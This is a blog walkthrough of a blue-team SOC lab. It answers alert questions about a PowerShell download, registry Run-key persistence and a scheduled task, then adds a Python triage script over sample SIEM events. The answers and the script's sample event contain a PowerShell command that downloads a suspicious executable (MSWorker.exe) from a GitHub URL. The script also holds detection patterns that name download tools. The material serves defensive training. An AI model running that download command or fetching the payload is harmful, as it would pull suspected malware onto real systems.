SOC ALPHA 1 — Blue Team Labs Online Walkthrough

Vivian Njau
3 min read · Jan 15, 2024


  • ELK
  • Log Analysis
  • Network Analysis

Alerts file: use the README file to get all the details on the alerts.

ELK should start within 5 minutes; if it does not, start the services manually by running the commands below:
sudo systemctl start elasticsearch
sudo systemctl start kibana
sudo systemctl start logstash

Scenario: You are a SOC analyst, and handling the alerts within your SIEM, ELK, is part of your daily duties. Answer the following questions by analyzing the alerts provided in README.txt!

NB: Q stands for Question and A stands for Answer.

Q. Alert 1 (1/2) — What is the cmdlet used for downloading?

Let's begin by first understanding what a cmdlet is. A cmdlet is a tiny, lightweight command used in the Windows PowerShell environment. It exists as a small script that performs a specific, single function, such as copying files or changing directories.

Access Kibana with Firefox at http://localhost:5601/.

Go to Analytics, then click on Discover.

Use the README file to get the details of the alert in question.

A. invoke-webrequest (this cmdlet sends HTTP, HTTPS, FTP and file requests to a web page or web service. It parses the response and returns collections of forms, links, images and other significant HTML elements. For more information visit https://learn.microsoft.com/en-gb/powershell/module/Microsoft.PowerShell.Utility/Invoke-WebRequest?view=powershell-5.1)

Q. Alert 1 (2/2) — What is the full URL from which the file is downloaded?

A. https://raw.githubusercontent.com/nerrorsec/SBT-SOC/main/MSWorker.exe

Q. Alert 2 (1/1) — What is the name of the suspicious EXE that is added for Persistence?

A. MSworker.exe

Q. Alert 3 (1/2) — What is the name of the suspicious executable file involved?

A. service.exe

Q. Alert 3 (2/2) — What is the name of the key path?

A. service

Q. Alert 4 (1/2) — What is the name of the task?

A. My Task

Q. Alert 4 (2/2) — What is the full path of the program?

A. C:\Program Files\GameLoaderGen\gen.bat
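The four alerts above are the classic triage trio: a PowerShell download cmdlet, an executable added to a registry Run key, and a scheduled task pointing at a program. As an added example (not part of the original walkthrough or the BTLO lab), the script below runs that triage over a few constructed SIEM records and pulls out exactly the artefacts the questions ask for: the cmdlet and URL, the Run-key value name and the executable it launches, and the task name and program path. The records are in a flat, ECS-like shape; the field names, event shapes, hostname and registry hive paths are assumptions, and only the cmdlet, URL, file names, key name and task details come from the answers above. It goes slightly beyond the lab by also matching RunOnce keys and several other download cmdlets, and it drops stray quote characters from extracted URLs so a copied log line does not end up in the answer.

```python
"""Added example: triage of SIEM records for the three alert types in this
walkthrough (download cmdlet, registry Run-key persistence, scheduled task).
Field names are an assumption, not the lab's actual ELK mapping."""
import re

# Common PowerShell download cmdlets and their aliases.
DOWNLOAD_CMDLETS = re.compile(
    r"\b(Invoke-WebRequest|Invoke-RestMethod|Start-BitsTransfer|iwr|wget|curl)\b",
    re.IGNORECASE,
)
# Stops at whitespace or a quote, so a trailing " from the log line is not kept.
URL_RE = re.compile(r"""https?://[^\s'"]+""")
# Value name written under ...\CurrentVersion\Run or \RunOnce (the "key path").
RUN_KEY_RE = re.compile(
    r"\\CurrentVersion\\(Run|RunOnce)\\(?P<value>[^\\]+)$", re.IGNORECASE
)
# File name portion of the program the Run-key value launches.
IMAGE_RE = re.compile(r'([^\\/"\s]+\.(?:exe|bat|cmd|ps1|vbs|dll))', re.IGNORECASE)

# Constructed sample events. Event IDs used: 4104 (PowerShell script block),
# 13 (Sysmon registry value set), 4698 (scheduled task created).
# Hostname, SID, hive paths and the on-disk locations are placeholders.
SAMPLE_EVENTS = [
    {"host": "WS01", "event_id": 4104,
     "process_command_line": 'powershell.exe -c "Invoke-WebRequest -Uri '
                             'https://raw.githubusercontent.com/nerrorsec/SBT-SOC/main/MSWorker.exe"'},
    {"host": "WS01", "event_id": 13,
     "registry_path": r"HKU\S-1-5-21-PLACEHOLDER\Software\Microsoft\Windows\CurrentVersion\Run\MSworker",
     "registry_data": r"C:\Users\Public\MSworker.exe"},
    {"host": "WS01", "event_id": 13,
     "registry_path": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\service",
     "registry_data": r"C:\Windows\Temp\service.exe"},
    {"host": "WS01", "event_id": 4698, "task_name": "\\My Task",
     "task_command": r"C:\Program Files\GameLoaderGen\gen.bat"},
    {"host": "WS01", "event_id": 4104,  # benign: no download cmdlet
     "process_command_line": "powershell.exe Get-ChildItem C:\\Users"},
]


def check_download(event):
    """Alert 1: which cmdlet downloaded, and from which URL(s)."""
    cmd = event.get("process_command_line", "")
    m = DOWNLOAD_CMDLETS.search(cmd)
    if not m:
        return None
    urls = [u.rstrip(",.)") for u in URL_RE.findall(cmd)]
    return {"alert": "download_cmdlet", "host": event["host"],
            "cmdlet": m.group(1), "urls": urls}


def check_run_key(event):
    """Alerts 2 and 3: Run-key value name and the executable it points at."""
    m = RUN_KEY_RE.search(event.get("registry_path", ""))
    if not m:
        return None
    img = IMAGE_RE.search(event.get("registry_data", ""))
    return {"alert": "runkey_persistence", "host": event["host"],
            "key_path": m.group("value"), "image": img.group(1) if img else None}


def check_scheduled_task(event):
    """Alert 4: task name and the full path of the program it runs."""
    if event.get("event_id") != 4698:
        return None
    return {"alert": "scheduled_task", "host": event["host"],
            "task_name": event["task_name"].lstrip("\\"),
            "program": event["task_command"]}


CHECKS = (check_download, check_run_key, check_scheduled_task)


def triage(events):
    """Run every check over every event; return the findings in event order."""
    findings = []
    for ev in events:
        for check in CHECKS:
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

In Kibana Discover the same work is done by filtering on the command line, registry path and event ID fields; the script simply makes the extraction explicit so the four answers (cmdlet and URL, MSworker.exe, service and service.exe, My Task and gen.bat) fall out of the records rather than out of eyeballing them.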


Written by Vivian Njau

Vivian, a passionate Cyber Security Analyst, actively seeks challenges to develop skills and make a meaningful impact in the ever-evolving security landscape.
